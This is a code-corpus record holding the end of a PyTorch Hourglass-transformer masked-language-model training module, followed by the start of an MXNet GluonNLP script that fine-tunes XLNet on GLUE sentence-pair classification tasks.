__init__(self, input_dim, num_heads, dim_feedforward = None, dropout=0.0):\n \"\"\"\n Inputs:\n input_dim - Dimensionality of the input\n num_heads - Number of heads to use in the attention block\n dim_feedforward - Dimensionality of the hidden layer in the MLP\n dropout - Dropout probability to use in the dropout layers\n \"\"\"\n super().__init__()\n if dim_feedforward == None:\n dim_feedforward = input_dim*4\n # Attention layer\n self.self_attn = MultiheadAttention(input_dim, input_dim, num_heads)\n\n # Two-layer MLP\n self.linear_net = nn.Sequential(\n nn.Linear(input_dim, dim_feedforward),\n nn.Dropout(dropout),\n nn.GELU(),\n nn.Linear(dim_feedforward, input_dim)\n )\n\n # 
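`CosineWarmupScheduler` above multiplies every base learning rate by a factor that is a pure function of the step, so the schedule can be probed without constructing an optimizer. A numeric sanity check of that factor:

```python
import numpy as np

def lr_factor(step, warmup, max_iters):
    factor = 0.5 * (1 + np.cos(np.pi * step / max_iters))
    if step <= warmup:
        factor *= step / warmup
    return factor

print(lr_factor(0, 100, 1000))     # 0.0   - start of warmup
print(lr_factor(100, 100, 1000))   # ~0.98 - warmup done, cosine near its top
print(lr_factor(1000, 100, 1000))  # 0.0   - fully decayed
```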
Layers to apply in between the main layers\n self.norm1 = nn.LayerNorm(input_dim)\n self.norm2 = nn.LayerNorm(input_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, mask=None):\n # Attention part\n attn_out,att = self.self_attn(x, mask=mask, return_attention = True)\n x = x + self.dropout(attn_out)\n x = self.norm1(x)\n\n # MLP part\n linear_out = self.linear_net(x)\n x = x + self.dropout(linear_out)\n x = self.norm2(x)\n\n return x, att\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self, num_layers, d_model, n_head, reduce = False):\n super().__init__()\n self.reduce = reduce\n self.layers = nn.ModuleList([nn.TransformerEncoderLayer(d_model=d_model, nhead=n_head) for _ in range(num_layers)])\n\n def forward(self, x, mask=None):\n # trackarray = torch.zeroes(x.shape[0,1])\n trackarray = torch.cat( [torch.LongTensor(list(range(x.shape[1])) ).unsqueeze(0) for i in range(x.shape[0])])\n # mask = torch.matmul(mask.unsqueeze(-1).transpose(1,2).float(),mask.unsqueeze(-1).float()).long().unsqueeze(1)\n mask = mask.transpose(0,1)#.bool()\n # print(mask)\n # print(mask.type())\n # print(trackarray)\n for a,l in enumerate(self.layers):\n # print(\"shape of x at layer \",x.shape)\n x,att = l(x, src_key_padding_mask=mask)\n # print(\"shape of x at layer after compute\",x.shape)\n\n if self.reduce and a % 3 == 0:\n x, mask, trackarray = self.extract(x,att, mask = mask, trackarray = trackarray)\n # print(\"shape of x at layer after extract\",x.shape)\n return x, trackarray\n\n def extract(self, x, attention, mask = None, trackarray = None, attention_based = True, similarity_based = True, reduction_fac = 2): \n # x is assumed to be (batch, seqlen, d_model)\n #attentions is assumed to be (batch,num_heads, seqlen, seqlen )\n\n if attention_based:\n attentions = torch.sum(attention, dim = (1,2))\n sorted_att, indices = torch.topk(attentions,int(attentions.shape[1]/reduction_fac), dim = -1, sorted = False) #dont know which to reduce(row or col)\n x = torch.cat( [x[i,indices[i]].unsqueeze(0) for i in range(x.shape[0])] ) \n mask = torch.cat( [mask[i,indices[i]].unsqueeze(0) for i in range(x.shape[0])] )\n trackarray = torch.cat( [trackarray[i,indices[i]].unsqueeze(0) for i in range(x.shape[0])] )\n \n if similarity_based:\n x = x\n return x, mask, trackarray\n\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len=5000):\n \"\"\"\n Inputs\n d_model - Hidden dimensionality of the input.\n max_len - Maximum length of a sequence to expect.\n \"\"\"\n super().__init__()\n\n # Create matrix of [SeqLen, HiddenDim] representing the positional encoding for max_len inputs\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0)\n\n # register_buffer => Tensor which is not a parameter, but should be part of the modules state.\n # Used for tensors that need to be on the same device as the module.\n # persistent=False tells PyTorch to not add the buffer to the state dict (e.g. 
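`extract()` above scores each token by the total attention it receives (summing over heads and query positions), keeps the top half with `torch.topk`, and then gathers per sample in a Python loop; the gather step can be vectorized, sketched here on dummy tensors:

```python
import torch

batch, heads, seqlen, d = 2, 4, 8, 16
x = torch.randn(batch, seqlen, d)
att = torch.softmax(torch.randn(batch, heads, seqlen, seqlen), dim=-1)

scores = att.sum(dim=(1, 2))                      # (batch, seqlen) score per token
_, idx = torch.topk(scores, seqlen // 2, dim=-1)  # indices of tokens to keep
kept = torch.gather(x, 1, idx.unsqueeze(-1).expand(-1, -1, d))
print(kept.shape)                                 # torch.Size([2, 4, 16])
```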
when we save the model)\n self.register_buffer('pe', pe, persistent=False)\n\n def forward(self, x):\n x = x + self.pe[:, :x.size(1)]\n return x\n\n \n\nclass TransformerPredictor(nn.Module):\n\n def __init__(self, input_dim, model_dim, num_classes, num_heads, num_layers,reduce = False, lr=1e-4,batch_size=8, dropout=0.1, weight_decay = 1e-2, mode = \"mlm\"):\n \"\"\"\n Inputs:\n input_dim - Hidden dimensionality of the input\n model_dim - Hidden dimensionality to use inside the Transformer\n num_classes - Number of classes to predict per sequence element\n num_heads - Number of heads to use in the Multi-Head Attention blocks\n num_layers - Number of encoder blocks to use.\n lr - Learning rate in the optimizer\n dropout - Dropout to apply inside the model\n \"\"\"\n super().__init__()\n self.dropout = dropout\n self.input_dim = input_dim\n self.model_dim = model_dim\n self.num_classes = num_classes\n self.num_layers = num_layers\n self.num_heads = num_heads\n self.lr = lr\n self.mode = mode\n self.loss = nn.CrossEntropyLoss()\n self.reduce = reduce\n self.batch_size = batch_size\n self.padding = True\n self.weight_decay = weight_decay\n self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n from transformers import BertConfig\n self.config = BertConfig()\n \n self.create_new_head(num_classes)\n # self._create_model()\n \n # self.model = BertModel(self.config)#.from_pretrained('bert-base-uncased')\n self.model = HourglassTransformerLM(num_tokens = self.config.vocab_size,dim = 768,causal = False,attn_resampling = True,\n max_seq_len = 1024,shorten_factor = 2,depth = (3, (3, (3, 3, 3), 3), 3), heads = 12)\n\n\n self.optimizer = optim.Adam(self.parameters(), lr=self.lr, weight_decay = self.weight_decay)\n\n def _create_model(self):\n # Input dim -> Model \n self.embeddings = BertEmbeddings(self.config)\n # self.word_embeddings = nn.Embedding(self.input_dim, self.model_dim, padding_idx=self.config.pad_token_id)\n # self.position_embeddings = nn.Embedding(self.config.max_position_embeddings, self.model_dim)\n # self.token_type_embeddings = nn.Embedding(1, self.model_dim)\n # self.register_buffer(\"position_ids\", torch.arange(self.config.max_position_embeddings).expand((1, -1)))\n # self.emblayernorm = nn.LayerNorm(self.model_dim)\n # self.embdropout = nn.Dropout(self.dropout)\n\n # self.input_net = nn.Sequential(\n # # nn.Dropout(self.input_dropout),\n # nn.Linear(self.input_dim, self.model_dim),\n # # nn.ReLU(inplace=True),\n # # nn.Linear(self.model_dim, self.model_dim),\n # )\n # self.seg_embedding = nn.Sequential(nn.Linear(1, self.model_dim)\n # )\n # # Positional encoding for sequences\n # self.positional_encoding = PositionalEncoding(d_model=self.model_dim)\n # # Transformer\n encoder_layer = nn.TransformerEncoderLayer(d_model=self.model_dim, nhead=self.num_heads)\n self.transformer = nn.TransformerEncoder(encoder_layer, num_layers=self.num_layers)\n # self.transformer = TransformerEncoder(num_layers=self.num_layers,\n # d_model=self.model_dim,\n # n_head=self.num_heads,\n # reduce = self.reduce)\n\n # Output classifier per sequence lement\n self.output_net = nn.Sequential(\n nn.Linear(self.model_dim, self.model_dim),\n nn.LayerNorm(self.model_dim),\n nn.ReLU(inplace=True),\n nn.Dropout(self.dropout),\n nn.Linear(self.model_dim, self.num_classes),\n # nn.Softmax(dim = -1)\n )\n\n def create_new_head(self, num_classes):\n self.output_net = nn.Sequential(\n nn.Linear(self.model_dim, self.model_dim),\n nn.LayerNorm(self.model_dim),\n nn.ReLU(inplace=True),\n 
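A small check of the sinusoidal table that `PositionalEncoding` above registers as a non-persistent buffer: even columns hold sines and odd columns cosines, so position 0 encodes to alternating zeros and ones:

```python
import math
import torch

d_model, max_len = 8, 32
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float()
                     * (-math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
print(pe[0])   # tensor([0., 1., 0., 1., 0., 1., 0., 1.])
```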
nn.Dropout(self.dropout),\n nn.Linear(self.model_dim, num_classes)\n )\n self.output_net.to(device)\n self.optimizer = optim.Adam(self.parameters(), lr=self.lr)\n \n\n def oldforward(self, x, token_type_ids = None, mask=None, add_positional_encoding=True):\n \"\"\"\n Inputs:\n x - Input features of shape [Batch, SeqLen, input_dim]\n mask - Mask to apply on the attention outputs (optional)\n add_positional_encoding - If True, we add the positional encoding to the input.\n Might not be desired for some tasks.\n \"\"\"\n\n # inputs_embeds = self.word_embeddings(x)\n # token_type_embeddings = self.token_type_embeddings(token_type_ids)\n\n # embeddings = inputs_embeds + token_type_embeddings\n # if add_positional_encoding:\n # position_ids = self.position_ids[:, : x.size()[1] ]\n # position_embeddings = self.position_embeddings(position_ids)\n # embeddings += position_embeddings\n # embeddings = self.emblayernorm(embeddings)\n # embedding_output = self.embdropout(embeddings)\n\n # print(x)\n # print(x.shape)\n embedding_output = self.embeddings(\n input_ids=x,\n token_type_ids=token_type_ids,\n )\n\n # x = F.one_hot(x, self.input_dim)\n # x = self.input_net(x.float())\n # if add_positional_encoding:\n # x = self.positional_encoding(x)\n # if not token_type_ids == None:\n # x = x + self.seg_embedding(token_type_ids.unsqueeze(-1).type(torch.float))\n # x = self.emblayernorm(x)\n # embedding_output = self.embdropout(x)\n # print(embedding_output)\n # print(embedding_output.shape)\n x = self.transformer(embedding_output, src_key_padding_mask=mask.transpose(0,1))\n # print(x.shape)\n if self.mode == \"cls\":\n x = x[:,0]\n # print(x.shape)\n #x,_ = torch.max(x, dim = 1)\n x = self.output_net(x)\n #x = F.softmax(x, dim = 1)\n return x, trackarray\n\n def forward(self, x, mask=None, token_type_ids = None):\n x = self.model(x, mask = mask, token_type_ids = token_type_ids) \n \n # x = x.last_hidden_state[:,0]\n if self.mode == \"cls\":\n x = x[:,0]\n x = self.output_net(x)\n\n return x\n\n\n def mask(self, input_ids, mask_token_id = 103):\n # create random array of floats in equal dimension to input_ids\n rand = torch.rand(input_ids.shape).to(device)\n # where the random array is less than 0.15, we set true\n mask_arr = (rand < 0.15) * (input_ids != 101) * (input_ids != 102)* (input_ids != 0)\n mask_arr1 = (rand < 0.15*0.8)* (input_ids != 101) * (input_ids != 102)* (input_ids != 0) #* (mask_arr)\n mask_arr2 = (0.15*0.8 < rand)* (rand < 0.15*0.9)* (input_ids != 101) * (input_ids != 102)* (input_ids != 0)\n # mask_arr3 = (0.15*0.9 < rand < 0.15)* (input_ids != 101) * (input_ids != 102)* (input_ids != 0) not needed since just nothing is done\n\n input_ids = torch.where(mask_arr1, mask_token_id, input_ids)#80% normal masking\n input_ids = torch.where(mask_arr2, (torch.rand(1, device = device)* self.tokenizer.vocab_size).long(), input_ids)#10% random token\n #last 10% is just original token and does not need to be replaced\n return input_ids, mask_arr\n \n def compute_mlm_loss(self,output,labels):\n output = output.flatten(start_dim = 0, end_dim = 1)\n labels = labels.flatten(start_dim = 0, end_dim = 1)\n loss = self.loss(output, labels)\n return loss\n\n #todo test mlm results\n\n def fitmlm(self,dataset, steps, checkpoint_pth = None):\n self.scheduler =CosineWarmupScheduler(optimizer= self.optimizer, \n warmup = 3000 ,\n max_iters = steps)\n wandb.init(project=\"mlmwith-hourglass\")\n wandb.watch(self)\n self.mode = \"mlm\"\n runinngloss = 0.0\n stepsperloss = 0\n for i,data in enumerate(dataset):\n start 
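An empirical probe of the 80/10/10 rule implemented by `mask()` above, run on dummy ids with no special tokens (BERT's vocab size 30522 assumed). Unlike the record, which broadcasts a single random id to every "random" slot, this draws a fresh token per position, which is the more common variant:

```python
import torch

torch.manual_seed(0)
ids = torch.randint(1000, 2000, (1, 10_000))   # ordinary tokens only
rand = torch.rand(ids.shape)
selected = rand < 0.15                         # ~15% of positions chosen
to_mask = rand < 0.15 * 0.8                    # 80% of those -> [MASK]
to_random = (rand >= 0.15 * 0.8) & (rand < 0.15 * 0.9)   # 10% -> random id

out = torch.where(to_mask, torch.tensor(103), ids)       # 103 = [MASK]
out = torch.where(to_random, torch.randint(0, 30_522, ids.shape), out)
print(round(selected.float().mean().item(), 3))      # ~0.15
print(round((out == 103).float().mean().item(), 3))  # ~0.12 (= 0.15 * 0.8)
```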
= time.time()\n \n input = self.tokenizer(data, return_tensors=\"pt\", padding=True, max_length = 256, truncation = True)\n input = input.to(device)\n labels = torch.clone(input[\"input_ids\"])\n input[\"input_ids\"], mask = self.mask(input[\"input_ids\"])\n labels = torch.where(mask, labels, -100)\n\n self.zero_grad()\n\n output = self(input[\"input_ids\"], mask = input[\"attention_mask\"].bool())\n loss = self.compute_mlm_loss(output,labels)\n loss.backward()\n stepsperloss += 1\n runinngloss += loss.item()\n self.optimizer.step()\n self.scheduler.step()\n\n\n # sentence = torch.argmax(output[0], dim = -1)\n # strsent = self.tokenizer.decode(sentence)\n # print(\"og sentence\",data[0])\n # print(\"pred sentence\",strsent)\n # pred = torch.masked_select(sentence, mask)\n # sellabels = torch.masked_select(labels, mask)\n # print(\"og words\",self.tokenizer.decode(sellabels))\n # print(\"pred words\",self.tokenizer.decode(pred))\n \n if i % np.max((1,int(steps*0.001))) == 0:\n wandb.log({\"loss\": runinngloss / stepsperloss})\n wandb.log({\"lr\": self.scheduler.get_last_lr()[0]})\n with torch.no_grad():\n y_pred = torch.argmax(output,dim = -1)\n acc = torch.sum(y_pred == labels)\n wandb.log({\"acc\": acc.item()/self.batch_size})\n print( runinngloss/ stepsperloss, \"at\", i , \"of\", steps, \"time per step\",time.time()-start, \"estimated time until end of epoch\", (steps -i) * (time.time()-start))\n runinngloss = 0.0\n stepsperloss = 0 \n if not checkpoint_pth == None and i % np.max((1,int(steps*0.1))) == 0:\n torch.save(self, checkpoint_pth)\n if i >= steps:\n break\n\n\n def oldfit(self,X,y, epochs, num_classes):\n self.create_new_head(num_classes)\n self.scheduler =CosineWarmupScheduler(optimizer= self.optimizer, \n warmup = math.ceil(len(X)*epochs *0.01 / self.batch_size) ,\n max_iters = math.ceil(len(X)*epochs / self.batch_size))\n self.mode = \"cls\"\n wandb.init(project=\"my-test-project\")\n wandb.config = {\n \"learning_rate\": self.lr,\n \"num_layers\": self.num_layers,\n \"num_classes\": num_classes,\n \"batch_size\": self.batch_size\n }\n wandb.watch(self)\n for e in range(epochs):\n print(\"at epoch\", e)\n runinngloss = 0.0\n stepsperloss = 0\n for i in range(math.ceil(len(X) / self.batch_size)):\n start = time.time()\n ul = min((i+1) * self.batch_size, len(X))\n batch_x = X[i*self.batch_size: ul]\n batch_y = y[i*self.batch_size: ul]\n batch_x = self.tokenizer(batch_x, return_tensors=\"pt\", padding=self.padding, max_length = 256, truncation = True)\n\n batch_y = batch_y.to(device)\n batch_x = batch_x.to(device)\n self.optimizer.zero_grad()\n # print(batch_x)\n # print(batch_y)\n y_pred,_ = self(batch_x[\"input_ids\"], mask = batch_x[\"attention_mask\"],token_type_ids = batch_x[\"token_type_ids\"])\n # print(y_pred.shape)\n # print(y_pred)\n # print(batch_y)\n loss = self.loss(y_pred, batch_y) \n loss.backward()\n\n runinngloss += loss.item()\n stepsperloss += 1\n self.optimizer.step()\n self.scheduler.step()\n if i % np.max((1,int((len(X)/self.batch_size)*0.001))) == 0:\n wandb.log({\"loss\": runinngloss / stepsperloss})\n # print(\"lr\", self.scheduler.get_last_lr())\n wandb.log({\"lr\": self.scheduler.get_last_lr()[0]})\n with torch.no_grad():\n y_pred = torch.argmax(y_pred,dim = -1)\n acc = torch.sum(y_pred == batch_y)\n wandb.log({\"acc\": acc.item()/self.batch_size})\n print( runinngloss/ stepsperloss, \"at\", ul , \"of\", len(X), \"time per step\",time.time()-start, \"estimated time until end of epoch\", (math.ceil(len(X) / self.batch_size) -i) * (time.time()-start))\n 
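Why `torch.where(mask, labels, -100)` in `fitmlm()` above suffices to restrict the loss to masked positions: `nn.CrossEntropyLoss` ignores targets equal to `-100` by default (its `ignore_index`). A four-position check:

```python
import torch
import torch.nn as nn

logits = torch.randn(4, 10)                 # 4 positions, 10-token vocab
labels = torch.tensor([3, -100, -100, 7])   # only positions 0 and 3 count
loss = nn.CrossEntropyLoss()(logits, labels)
manual = nn.CrossEntropyLoss()(logits[[0, 3]], labels[[0, 3]])
assert torch.allclose(loss, manual)
```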
runinngloss = 0.0\n stepsperloss = 0\n\n def fit(self,X,y, epochs, num_classes):\n self.create_new_head(num_classes)\n self.scheduler =CosineWarmupScheduler(optimizer= self.optimizer, \n warmup = math.ceil(len(X)*epochs *0.01 / self.batch_size) ,\n max_iters = math.ceil(len(X)*epochs / self.batch_size))\n self.mode = \"cls\"\n wandb.init(project=\"my-test-project\")\n wandb.config = {\n \"learning_rate\": self.lr,\n \"num_layers\": self.num_layers,\n \"num_classes\": num_classes,\n \"batch_size\": self.batch_size\n }\n wandb.watch(self)\n for e in range(epochs):\n print(\"at epoch\", e)\n runinngloss = 0.0\n stepsperloss = 0\n for i in range(math.ceil(len(X) / self.batch_size)):\n start = time.time()\n ul = min((i+1) * self.batch_size, len(X))\n batch_x = X[i*self.batch_size: ul]\n batch_y = y[i*self.batch_size: ul]\n batch_x = self.tokenizer(batch_x, return_tensors=\"pt\", padding=self.padding, max_length = 256, truncation = True)\n\n batch_y = batch_y.to(device)\n batch_x = batch_x.to(device)\n self.optimizer.zero_grad()\n # print(batch_x)\n # print(batch_y)\n y_pred = self(batch_x[\"input_ids\"], mask = batch_x[\"attention_mask\"].bool(),token_type_ids = batch_x[\"token_type_ids\"])\n # print(y_pred.shape)\n # print(y_pred)\n # print(batch_y)\n loss = self.loss(y_pred, batch_y) \n loss.backward()\n\n runinngloss += loss.item()\n stepsperloss += 1\n self.optimizer.step()\n self.scheduler.step()\n if i % np.max((1,int((len(X)/self.batch_size)*0.001))) == 0:\n wandb.log({\"loss\": runinngloss / stepsperloss})\n # print(\"lr\", self.scheduler.get_last_lr())\n wandb.log({\"lr\": self.scheduler.get_last_lr()[0]})\n with torch.no_grad():\n y_pred = torch.argmax(y_pred,dim = -1)\n acc = torch.sum(y_pred == batch_y)\n wandb.log({\"acc\": acc.item()/self.batch_size})\n print( runinngloss/ stepsperloss, \"at\", ul , \"of\", len(X), \"time per step\",time.time()-start, \"estimated time until end of epoch\", (math.ceil(len(X) / self.batch_size) -i) * (time.time()-start))\n runinngloss = 0.0\n stepsperloss = 0\n\n\n @torch.no_grad()\n def evaluate(self,X,y):\n acc = 0.0\n for i in range(math.ceil(len(X) / self.batch_size)):\n start = time.time()\n ul = min((i+1) * self.batch_size, len(X))\n batch_x = X[i*self.batch_size: ul]\n batch_y = y[i*self.batch_size: ul]\n batch_x = self.tokenizer(batch_x, return_tensors=\"pt\", padding=self.padding, max_length = 256, truncation = True)\n\n batch_y = batch_y.to(device)\n batch_x = batch_x.to(device)\n y_pred = self(batch_x[\"input_ids\"], mask = batch_x[\"attention_mask\"].bool(),token_type_ids = batch_x[\"token_type_ids\"])\n y_pred = torch.argmax(y_pred,dim = -1)\n acc = acc + torch.sum(y_pred == batch_y)\n\n acc = acc / len(X)\n return acc.item()\n\n \n \n\n\n\n \n\n \n\n\n","repo_name":"TheMody/POWERBERT","sub_path":"embedder.py","file_name":"embedder.py","file_ext":"py","file_size_in_byte":24360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22787264819","text":"\"\"\"\nSentence Pair Classification with XLNet\n\"\"\"\nimport io\nimport os\nimport time\nimport argparse\nimport random\nimport logging\nimport warnings\nimport sys\nfrom functools import partial\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import gluon\nimport gluonnlp as nlp\nfrom model.XLNet_classifier import XLNetClassifier\nfrom transformer import model\n\npath = sys.path[0]\nsys.path.append(path + '/../bert/data')\n#pylint: disable=wrong-import-position\nfrom classification import MRPCTask, QQPTask, RTETask, STSBTask, 
SSTTask, \\\n QNLITask, CoLATask, MNLITask, WNLITask, XNLITask, LCQMCTask, ChnSentiCorpTask\nfrom preprocessing_utils import truncate_seqs_equal, concat_sequences\n\ntasks = {\n 'MRPC': MRPCTask(),\n 'QQP': QQPTask(),\n 'QNLI': QNLITask(),\n 'RTE': RTETask(),\n 'STS-B': STSBTask(),\n 'CoLA': CoLATask(),\n 'MNLI': MNLITask(),\n 'WNLI': WNLITask(),\n 'SST': SSTTask(),\n 'XNLI': XNLITask(),\n 'LCQMC': LCQMCTask(),\n 'ChnSentiCorp': ChnSentiCorpTask()\n}\n\nparser = argparse.ArgumentParser(\n description='XLNet fine-tune examples for classification/regression tasks.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n# Training config\nparser.add_argument('--epochs', type=int, default=3, help='number of epochs.')\nparser.add_argument('--training_steps',\n type=int,\n help='If specified, epochs will be ignored.')\nparser.add_argument(\n '--batch_size',\n type=int,\n default=128,\n help='Batch size. Number of examples per gpu in a minibatch.')\n\nparser.add_argument(\n '--accumulate',\n type=int,\n default=None,\n help=\n 'The number of batches for gradients accumulation to simulate large batch size. '\n 'Default is None')\n\nparser.add_argument('--dev_batch_size',\n type=int,\n default=32,\n help='Batch size for dev set and test set')\n\nparser.add_argument('--dropout', type=float, default=0.1, help='dropout')\nparser.add_argument('--attention_dropout',\n type=float,\n default=0.1,\n help='attention dropout')\nparser.add_argument('--log_interval',\n type=int,\n default=10,\n help='report interval')\nparser.add_argument(\n '--early_stop',\n type=int,\n default=None,\n help='Whether to perform early stopping based on the metric on dev set. '\n 'The provided value is the patience. ')\n\n# Optimizer config\nparser.add_argument('--optimizer', type=str, default='Adam', help='')\nparser.add_argument('--lr',\n type=float,\n default=3e-5,\n help='Initial learning rate')\nparser.add_argument('--lr_decay',\n type=str,\n choices=['linear'],\n default='linear',\n help='lr schedule')\nparser.add_argument('--epsilon',\n type=float,\n default=1e-6,\n help='Small value to avoid division by 0')\nparser.add_argument(\n '--warmup_ratio',\n type=float,\n default=0,\n help='ratio of warmup steps used in NOAM\\'s stepsize schedule')\n\n# task spesific & data preprocessing\nparser.add_argument('--gpu',\n type=int,\n default=None,\n help='Number of gpus for finetuning.')\nparser.add_argument('--task_name',\n default='MRPC',\n type=str,\n help='The name of the task to fine-tune.')\n\nparser.add_argument(\n '--model_name',\n type=str,\n default='xlnet_cased_l12_h768_a12',\n choices=['xlnet_cased_l24_h1024_a16', 'xlnet_cased_l12_h768_a12'],\n help='The name of pre-trained XLNet model to fine-tune')\n\nparser.add_argument('--dataset',\n type=str,\n default='126gb',\n help='The dataset BERT pre-trained with.')\nparser.add_argument('--max_len',\n type=int,\n default=128,\n help='Maximum length of the sentence pairs')\n\nparser.add_argument(\n '--round_to', type=int, default=None,\n help='The length of padded sequences will be rounded up to be multiple of this argument.'\n 'When round to is set to 8, training throughput may increase for mixed precision'\n 'training on GPUs with tensorcores.')\n\nparser.add_argument(\n '--only_inference',\n action='store_true',\n help=\n 'If set, we skip training and only perform inference on dev and test data.'\n)\n\n# Initializing config\nparser.add_argument('--seed', type=int, default=2, help='Random seed')\n\n# I/O config\nparser.add_argument(\n '--output_dir',\n type=str,\n 
default='./output_dir',\n help='The output directory where the model params will be written.')\nparser.add_argument(\n '--model_parameters',\n type=str,\n default=None,\n help='A parameter file for the model that is loaded into the model'\n ' before training/inference. It is different from the parameter'\n ' file written after the model is trained.')\n\nargs = parser.parse_args()\n\n\ndef split_array(arr, num_of_splits):\n \"\"\"split an array into equal pieces\"\"\"\n # TODO Replace this function with gluon.utils.split_data() once targeting MXNet 1.7\n size = arr.shape[0]\n if size < num_of_splits:\n return [arr[i:i + 1] for i in range(size)]\n slice_len, rest = divmod(size, num_of_splits)\n div_points = [0] + [(slice_len * index + min(index, rest) + slice_len +\n (index < rest)) for index in range(num_of_splits)]\n slices = [\n arr[div_points[i]:div_points[i + 1]] for i in range(num_of_splits)\n ]\n return slices\n\n\ndef split_and_load(arrs, _ctxs):\n \"\"\"split and load arrays to a list of contexts\"\"\"\n # TODO Replace split_array() with gluon.utils.split_data() once targeting MXNet 1.7\n assert isinstance(arrs, (list, tuple))\n # split and load\n loaded_arrs = [[\n i.as_in_context(ctx)\n for i, ctx in zip(split_array(arr, len(_ctxs)), _ctxs)\n ] for arr in arrs]\n return zip(*loaded_arrs)\n\n\ndef convert_examples_to_features(example,\n tokenizer=None,\n truncate_length=512,\n cls_token=None,\n sep_token=None,\n class_labels=None,\n label_alias=None,\n vocab=None,\n is_test=False):\n #pylint: disable=redefined-outer-name\n \"\"\"convert glue examples into necessary features\"\"\"\n assert vocab\n if not is_test:\n label_dtype = 'int32' if class_labels else 'float32'\n # get the label\n label = example[-1]\n example = example[:-1]\n #create label maps if classification task\n if class_labels:\n label_map = {}\n for (i, l) in enumerate(class_labels):\n label_map[l] = i\n if label_alias:\n for key in label_alias:\n label_map[key] = label_map[label_alias[key]]\n label = label_map[label]\n label = np.array([label], dtype=label_dtype)\n\n # tokenize raw text\n tokens_raw = [tokenizer(l) for l in example]\n # truncate to the truncate_length,\n tokens_trun = truncate_seqs_equal(tokens_raw, truncate_length)\n # concate the sequences with special tokens, cls_token is added to the end in XlNet\n special_tokens = [[sep_token]] * len(tokens_trun) + [[cls_token]]\n tokens, segment_ids, _ = concat_sequences(tokens_trun, special_tokens)\n # convert the token to ids\n input_ids = vocab[tokens]\n valid_length = len(input_ids)\n if not is_test:\n return input_ids, valid_length, segment_ids, label\n else:\n return input_ids, valid_length, segment_ids\n\n\ndef preprocess_data(_tokenizer,\n _task,\n batch_size,\n dev_batch_size,\n max_len,\n _vocab):\n \"\"\"Train/eval Data preparation function.\"\"\"\n label_dtype = 'int32' if _task.class_labels else 'float32'\n truncate_length = max_len - 3 if _task.is_pair else max_len - 2\n trans = partial(convert_examples_to_features,\n tokenizer=_tokenizer,\n truncate_length=truncate_length,\n cls_token=_vocab.cls_token,\n sep_token=_vocab.sep_token,\n class_labels=_task.class_labels,\n label_alias=_task.label_alias,\n vocab=_vocab)\n\n # data train\n # task.dataset_train returns (segment_name, dataset)\n train_tsv = _task.dataset_train()[1]\n data_train = list(map(trans, train_tsv))\n data_train = mx.gluon.data.SimpleDataset(data_train)\n data_train_len = data_train.transform(\n lambda _, valid_length, segment_ids, label: valid_length, lazy=False)\n\n # bucket 
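A quick check of `split_array()` above (the stand-in for `gluon.utils.split_data` noted in its TODO): chunk sizes differ by at most one, so an uneven batch still lands on every context:

```python
import numpy as np

def split_array(arr, num_of_splits):
    size = arr.shape[0]
    if size < num_of_splits:
        return [arr[i:i + 1] for i in range(size)]
    slice_len, rest = divmod(size, num_of_splits)
    div_points = [0] + [(slice_len * index + min(index, rest) + slice_len +
                         (index < rest)) for index in range(num_of_splits)]
    return [arr[div_points[i]:div_points[i + 1]]
            for i in range(num_of_splits)]

print([len(s) for s in split_array(np.arange(10), 3)])   # [4, 3, 3]
```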
sampler for training\n pad_val = _vocab[_vocab.padding_token]\n batchify_fn = nlp.data.batchify.Tuple(\n nlp.data.batchify.Pad(axis=0, pad_val=pad_val, round_to=args.round_to), # input\n nlp.data.batchify.Stack(), # length\n nlp.data.batchify.Pad(axis=0, pad_val=4, round_to=args.round_to), # segment\n nlp.data.batchify.Stack(label_dtype)) # label\n batch_sampler = nlp.data.sampler.FixedBucketSampler(data_train_len,\n batch_size=batch_size,\n num_buckets=10,\n ratio=0,\n shuffle=True)\n # data loader for training\n loader_train = gluon.data.DataLoader(dataset=data_train,\n num_workers=4,\n batch_sampler=batch_sampler,\n batchify_fn=batchify_fn)\n\n # data dev. For MNLI, more than one dev set is available\n dev_tsv = _task.dataset_dev()\n dev_tsv_list = dev_tsv if isinstance(dev_tsv, list) else [dev_tsv]\n loader_dev_list = []\n for segment, data in dev_tsv_list:\n data_dev = mx.gluon.data.SimpleDataset(list(map(trans, data)))\n loader_dev = mx.gluon.data.DataLoader(data_dev,\n batch_size=dev_batch_size,\n num_workers=4,\n shuffle=False,\n batchify_fn=batchify_fn)\n loader_dev_list.append((segment, loader_dev))\n\n # batchify for data test\n test_batchify_fn = nlp.data.batchify.Tuple(\n nlp.data.batchify.Pad(axis=0, pad_val=pad_val, round_to=args.round_to),\n nlp.data.batchify.Stack(),\n nlp.data.batchify.Pad(axis=0, pad_val=0, round_to=args.round_to))\n\n # transform for data test\n test_trans = partial(convert_examples_to_features,\n tokenizer=_tokenizer,\n truncate_length=max_len,\n cls_token=_vocab.cls_token,\n sep_token=_vocab.sep_token,\n class_labels=None,\n is_test=True,\n vocab=_vocab)\n\n # data test. For MNLI, more than one test set is available\n test_tsv = _task.dataset_test()\n test_tsv_list = test_tsv if isinstance(test_tsv, list) else [test_tsv]\n loader_test_list = []\n for segment, data in test_tsv_list:\n data_test = mx.gluon.data.SimpleDataset(list(map(test_trans, data)))\n loader_test = mx.gluon.data.DataLoader(data_test,\n batch_size=dev_batch_size,\n num_workers=4,\n shuffle=False,\n batchify_fn=test_batchify_fn)\n loader_test_list.append((segment, loader_test))\n return loader_train, loader_dev_list, loader_test_list, len(data_train)\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogging.captureWarnings(True)\nhandler = 